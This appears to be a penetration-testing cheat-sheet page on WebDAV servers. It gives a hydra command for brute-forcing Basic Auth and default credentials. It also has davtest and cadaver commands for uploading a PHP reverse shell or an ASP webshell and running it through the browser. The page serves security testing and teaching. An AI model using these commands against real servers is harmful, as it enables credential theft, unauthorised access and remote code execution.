WebDAV

Pentesting WebDAV - TCP Ports 80,443

Theory

WebDAV is a set of extensions to the Hypertext Transfer Protocol, which allows user agents to collaboratively author contents directly in an HTTP web server. Usually, to connect a WebDav server you will need valid credentials.

Practice

On Windows, users can also access and mount WebDAV shares via UNC paths, such as \\10.37.129.2@80\example_webdav_folder.

Brute-force (HTTP Basic Auth)

WebDAV usually require valid credentials using HTTP Basic Auth. You may bruteforce it using hydra

hydra -L users.txt -P passwords.txt example.domain.local http-get /webdavDirectory/

Default credentials are wampp:xampp

Upload a shell

Davtest will try to upload several files with different extensions and check if the extension is executed:

# Test and cleanup
davtest -url http://example.com/davdir -auth 'user:pass' -cleanup

#Uplaod .txt files and try to move it to other extensions
davtest -url http://example.com/davdir -auth 'user:pass' -cleanup -move

If we can upload the file e.g. PHP file, upload the script for reverse shell.

davtest -url http://example.com/davdir -auth 'user:pass' -uploadfile shell.php -uploadloc shell.php

Then we can navigate to http://example.com/davdir/shell.php to execute it.

You can use this tool to connect to the WebDav server and perform actions (like upload, move or delete) manually.

$ cadaver http://example.com/davdir
Username: bob
Password: 
dav:/davdir/> put /usr/share/webshells/asp/webshell.asp

Then we can navigate to http://example.com/davdir/webshell.asp to execute it.

Resources

Last updated 10 months ago

Was this helpful?